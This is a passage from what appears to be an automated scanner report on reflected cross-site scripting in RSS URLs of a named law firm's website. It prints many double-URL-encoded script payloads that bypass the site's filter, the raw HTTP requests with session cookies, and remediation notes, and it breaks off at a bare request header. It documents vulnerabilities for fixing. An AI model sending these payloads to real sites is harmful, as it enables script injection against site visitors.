Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35e2f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e69c57b225b was submitted in the REST URL parameter 1. This input was echoed as 35e2f"><script>alert(1)</script>69c57b225b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss35e2f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e69c57b225b/practices/Privacy/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38e63%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e99d2689ecdb was submitted in the REST URL parameter 2. This input was echoed as 38e63"><script>alert(1)</script>99d2689ecdb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices38e63%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e99d2689ecdb/Privacy/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5a06f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eae4d6666dc0 was submitted in the REST URL parameter 3. This input was echoed as 5a06f"><script>alert(1)</script>ae4d6666dc0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Privacy5a06f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eae4d6666dc0/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4256c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e823dd7739be was submitted in the REST URL parameter 4. This input was echoed as 4256c"><script>alert(1)</script>823dd7739be in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Privacy/rss.xml4256c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e823dd7739be HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab6ad%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3058a7872f was submitted in the REST URL parameter 1. This input was echoed as ab6ad"><script>alert(1)</script>3058a7872f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rssab6ad%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3058a7872f/practices/Professional_Liability/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b635c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebb61d6adb13 was submitted in the REST URL parameter 2. This input was echoed as b635c"><script>alert(1)</script>bb61d6adb13 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practicesb635c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebb61d6adb13/Professional_Liability/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b62f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e209c75ecebf was submitted in the REST URL parameter 3. This input was echoed as 7b62f"><script>alert(1)</script>209c75ecebf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Professional_Liability7b62f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e209c75ecebf/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3cc2%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e842ba8b7f27 was submitted in the REST URL parameter 4. This input was echoed as a3cc2"><script>alert(1)</script>842ba8b7f27 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Professional_Liability/rss.xmla3cc2%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e842ba8b7f27 HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43538%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e239e5feec7 was submitted in the REST URL parameter 1. This input was echoed as 43538"><script>alert(1)</script>239e5feec7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss43538%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e239e5feec7/practices/Public_Policy/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95bab%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4f44ea70a80 was submitted in the REST URL parameter 2. This input was echoed as 95bab"><script>alert(1)</script>4f44ea70a80 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices95bab%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4f44ea70a80/Public_Policy/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf26f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee7d3032f123 was submitted in the REST URL parameter 3. This input was echoed as bf26f"><script>alert(1)</script>e7d3032f123 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Public_Policybf26f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee7d3032f123/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc78d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e35e1d1edf9 was submitted in the REST URL parameter 4. This input was echoed as cc78d"><script>alert(1)</script>35e1d1edf9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Public_Policy/rss.xmlcc78d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e35e1d1edf9 HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e1f4%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0a2d2f96202 was submitted in the REST URL parameter 1. This input was echoed as 8e1f4"><script>alert(1)</script>0a2d2f96202 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss8e1f4%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0a2d2f96202/practices/White_Collar_Defense/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68e4a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edceb9945ee4 was submitted in the REST URL parameter 2. This input was echoed as 68e4a"><script>alert(1)</script>dceb9945ee4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices68e4a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edceb9945ee4/White_Collar_Defense/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74b35%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3123ddbb2f4 was submitted in the REST URL parameter 3. This input was echoed as 74b35"><script>alert(1)</script>3123ddbb2f4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/White_Collar_Defense74b35%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3123ddbb2f4/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:31 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3f91%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e069fcdb3970 was submitted in the REST URL parameter 4. This input was echoed as b3f91"><script>alert(1)</script>069fcdb3970 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/White_Collar_Defense/rss.xmlb3f91%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e069fcdb3970 HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:38 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85268%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8395fd2c6ad was submitted in the REST URL parameter 1. This input was echoed as 85268"><script>alert(1)</script>8395fd2c6ad in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss85268%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8395fd2c6ad/publications/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:10:52 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 438f3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2ac3b841518 was submitted in the REST URL parameter 2. This input was echoed as 438f3"><script>alert(1)</script>2ac3b841518 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/publications438f3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2ac3b841518/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:10:55 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7207%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5a1738ffeb4 was submitted in the REST URL parameter 3. This input was echoed as d7207"><script>alert(1)</script>5a1738ffeb4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
